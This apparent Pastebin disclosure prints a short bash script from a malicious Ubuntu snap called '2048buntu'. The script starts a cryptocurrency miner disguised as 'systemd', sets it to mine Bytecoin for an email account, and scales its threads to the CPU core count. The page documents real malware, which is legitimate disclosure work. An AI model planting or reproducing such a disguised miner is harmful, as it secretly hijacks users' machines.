Advertisement
H0XH4

malware Snaps in Ubuntu Snaps Store

May 12th, 2018
322
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 0.39 KB | None | 0 0
  1. #!/bin/bash
  2.  
  3. currency=bcn
  4. name=2048buntu
  5.  
  6.  
  7. { # try
  8. /snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 1 -g
  9. } || { # catch
  10. cores=($(grep -c ^processor /proc/cpuinfo))
  11.  
  12. if (( $cores < 4 )); then
  13.     /snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 1
  14. else
  15.     /snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 2
  16. fi
  17. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement